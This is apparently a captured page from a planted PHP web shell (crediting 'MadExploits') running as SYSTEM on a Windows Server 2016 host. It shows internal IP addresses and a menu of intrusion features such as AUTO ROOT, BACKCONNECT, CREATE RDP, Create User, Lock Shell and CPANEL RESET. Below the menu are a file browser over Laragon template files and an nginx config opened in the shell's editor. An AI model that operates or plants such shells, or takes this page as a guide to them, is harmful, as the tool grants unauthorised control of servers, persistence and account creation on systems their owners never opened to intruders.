Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
laragon /
tpl /
[ HOME SHELL ]
Name
Size
Permission
Action
MariaDB.my.ini.manifest.tpl
611
B
-rw-rw-rw-
MySQL.my.ini.manifest.tpl
408
B
-rw-rw-rw-
Procfile.manifest
840
B
-rw-rw-rw-
VirtualHost.SSL.manifest.tpl
651
B
-rw-rw-rw-
VirtualHost.manifest.tpl
328
B
-rw-rw-rw-
mongod.conf.manifest.tpl
772
B
-rw-rw-rw-
nginx.conf.manifest.tpl
901
B
-rw-rw-rw-
nginx.server.SSL.manifest.tpl
1.08
KB
-rw-rw-rw-
nginx.server.manifest.tpl
829
B
-rw-rw-rw-
nginx.sites-enabled.00-default...
1.12
KB
-rw-rw-rw-
nginx.sites-enabled.00-default...
764
B
-rw-rw-rw-
openssl.conf.tpl
374
B
-rw-rw-rw-
pip.bat.manifest
122
B
-rw-rw-rw-
stop-mongod.bat
57
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nginx.conf.manifest.tpl
#user nobody; worker_processes 1; #error_log logs/error.log; #error_log logs/error.log notice; #error_log logs/error.log info; #pid logs/nginx.pid; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; #log_format main '$remote_addr - $remote_user [$time_local] "$request" ' # '$status $body_bytes_sent "$http_referer" ' # '"$http_user_agent" "$http_x_forwarded_for"'; #access_log logs/access.log main; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; #gzip on; include "<<LARAGON_ROOT>>/etc/nginx/php_upstream.conf"; include "<<LARAGON_ROOT>>/etc/nginx/sites-enabled/*.conf"; client_max_body_size 2000M; server_names_hash_bucket_size 64; }
Close